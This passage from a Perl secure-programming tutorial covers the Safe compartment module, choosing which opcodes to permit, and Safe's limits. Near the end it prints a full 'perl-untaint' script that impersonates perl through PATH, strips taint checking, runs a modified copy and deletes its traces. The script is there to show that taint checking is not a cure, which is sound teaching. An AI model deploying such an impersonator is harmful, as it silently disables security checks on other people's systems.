my $compartment = Safe->new;
my $root = $compartment->root;
say "Safe namespace is $root";

no strict 'refs';
*{ $root . '::DESTROY' } = sub {
    my( $self, $arg ) = @_;
    $arg //= 'default';
    say "Calling DESTROY with $self $arg";
    };

say "$root can DESTROY" if $root->can( 'DESTROY' );
$root->DESTROY( 'Explicit' );
}

When I run this, I see that I was able to define the DESTROY method and call it explicitly as a class method, but I don’t get any output from $compartment goes out of scope when I might expect it to be called as an instance method:

% perl safe-root.pl
Safe namespace is Safe::Root0
Safe::Root0 can DESTROY
Calling DESTROY with Safe::Root0 Explicit

Compare this to the equivalent “unsafe” code where I create a do nothing class with the same methods:

# unsafe.pl
use v5.10;

package Unsafe {
    sub new { bless {}, $_[0] }
    sub root { __PACKAGE__ }
    }

{
my $compartment = Unsafe->new;
my $root = $compartment->root;
say "Unsafe namespace is $root";

no strict 'refs';
*{ $root . '::DESTROY' } = sub {
    my( $self, $arg ) = @_;
    $arg //= 'default';
    say "Calling DESTROY with $self $arg";
    };

say "$root can DESTROY" if $root->can( 'DESTROY' );
$root->DESTROY( 'Explicit' );
}

When I run that program, I see two calls to DESTROY, one of which is a class method call and one which is

% perl unsafe.pl
Unsafe namespace is Unsafe
Unsafe can DESTROY
Calling DESTROY with Unsafe Explicit
Calling DESTROY with Unsafe=HASH(0x7fdf59005468) default

So, when would I want to use this? In the rare case where I want to evaluate a bit of Perl that I get as a string, perhaps from configuration (although see Chapter 11 for why you should avoid that), serialization, or something else. For instance, I want to take a simple addition in the form of a string such as "2 + 2", and get the answer to the arithmetic. Instead of using a normal string eval, I can use Safe‘s reval.

I’ll start with a simple REPL program where someone enters a line and I return the answer only when they are doing exactly what I need. I start by creating a Safe compartment where I deny everything:

# add-repl.pl
use v5.16;
use Safe 2.35;

my $compartment = Safe->new;
$compartment->deny( qw(:default) );

LINE: while( <> ) {
    chomp;
    my $result = $compartment->reval( $_ ) or do {
        my $error = $@;
        warn "\tSafe compartment error for [$_]! $error";
        next LINE;
        };
    say "$_ = $result";
    }

When I try to run this, the compartment catches everything because I’ve allowed nothing:

% perl safe-repl.pl
2 + 2
    Safe compartment error for [2 + 2]! 'constant item' trapped

The problem is that Safe gives me a description of the operation it trapped, not the opcode name. That’s okay. I can see the complete map with a one-liner. It’s a long list that I extract here:

% perl -MOpcode=opdump -e opdump
     const  constant item
    padany  private value
     rv2gv  ref-to-glob cast
 leaveeval  eval "string" exit

If I want to find the ones that include a string, I can give opdump an argument:

% perl -MOpcode=opdump -e 'opdump shift' item
     const  constant item

So, I modify my program to allow const:

my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const) );

When I try again, I get a different violation:

% perl safe-repl.pl
2 + 2
    Safe compartment error for [2 + 2]! 'ref-to-glob cast' trapped

So, I find that opcode name:

% perl -MOpcode=opdump -e 'opdump shift' ref-to-glob
    rv2gv  ref-to-glob cast

I add that to the operations I permit:

my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const rv2gv) );

I try again, and again, to eventually I’ve sussed out all of the opcodes I need:

my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const rv2gv lineseq padany add leaveeval) );

If you’re one of the very few Perlers who know the opcodes just by looking at the code, you probably don’t have to go through this process. Now I have something that almost works:

% perl safe-repl.pl
2 + 2
2 + 2 = 4

I say “almost” because I’ve denied many opcodes but I haven’t limited all the undesirable statements that someone can make out of those. For instance, I can have a statement that has no addition in it, or a syntax error:

% perl5.18.0 safe-repl.pl
2 + 2
2 + 2 = 4
2
2 = 2
2 3 4
Number found where operator expected
        (Missing operator before  3?)
Number found where operator expected
        (Missing operator before  4?)
        Safe compartment error for [2 3 4]! syntax error

Safe Limitations

The Safe module has other limitations. It’s not going to keep the code I allow from using up all the memory or CPU. If I allow operations such as chdir, the rest of the program my see those side effects, and so on. As with the other things I have shown in this chapter, Safe doesn’t prevent bad things from ever happening. It makes someone work a lot harder to exploit problems, but only with careful programming and attention.

A Little Fun

Here’s a program that pretends to be the real perl, exploiting the same PATH insecurity the real perl catches. If I can trick you into thinking this program is perl, probably by putting it somewhere close to the front of your path, taint checking does you no good. It scrubs the argument list to remove -T, then scrubs the shebang line to do the same thing. It saves the new program, then runs it with a real perl which it gets from PATH (excluding itself, of course). Taint checking is a tool, not a cure. It tells me where I need to do some work. Have I said that enough yet?

#!/usr/bin/perl
# perl-untaint (rename as just 'perl')
use File::Basename;

# get rid of -T on command line
my @args = grep { ! /-T/ } @ARGV;

# determine program name. Usually that's the first thing
# after the switches (or the '--' which ends switches). This
# won't work if the last switch takes an argument, but handling
# that is just a matter of work.
my( $double ) = grep { $args[$_] eq '--' }  0 .. $#args;
my  @single   = grep { $args[$_] =~ m/^-/ } 0 .. $#args;

my $program_index = do {
       if( $double )  { $double + 1 }
    elsif( @single )  { $single[-1] + 1 }
    else              { 0 }
    };

my $program = splice @args, $program_index, 1, undef;

unless( -e $program ) {
    warn qq|Can't open perl program "$program": No such file or directory\n|;
    exit;
    }

# save the program to another location (current dir probably works)
my $modified_program = basename( $program ) . ".evil";
splice @args, $program_index, 1, $modified_program;

open FILE, '<', $program;
open TMP, '>', $modified_program or exit; # quiet!

my $shebang = <FILE>;
$shebang =~ s/-T//;

print TMP $shebang, <FILE>;

# find out who I am (the first thing in the path) and take out that dir
# this is especially useful if . is in the path.
my $my_dir = dirname( `which perl` );
$ENV{PATH} = join ":", grep {
    $_ ne $my_dir and $_ ne '.'
    } split /:/, $ENV{PATH};

# find the real perl now that I've reset the path
chomp( my $Real_perl = `which perl` );

# run the program with the right perl but without taint checking
system("$Real_perl @args");

# clean up. We were never here.
unlink $modified_program;

So there it is. When you think you have it figured out, someone is going to find another way. Even Samuel L. Jackson as a sysadmin couldn’t hold off the dinosaurs.

Summary

Perl knows that injudiciously passing around data can cause problems, and has features to give me, the programmer, ways to handle that. Taint checking is a tool that helps me find parts of the program that try to pass external data to resources outside of the program. Perl intends for me to scrutinize these data and turn them into something I can trust before I use them. Checking and scrubbing the data isn’t the only answer, and I need to program defensively using the other security features Perl offers. Even then, taint checking doesn’t ensure I’m completely safe and I still need to carefully consider the entire security environment just as I would with any other programming language.

Halaman

Selasa, 11 Agustus 2015

Secure Programming Techniques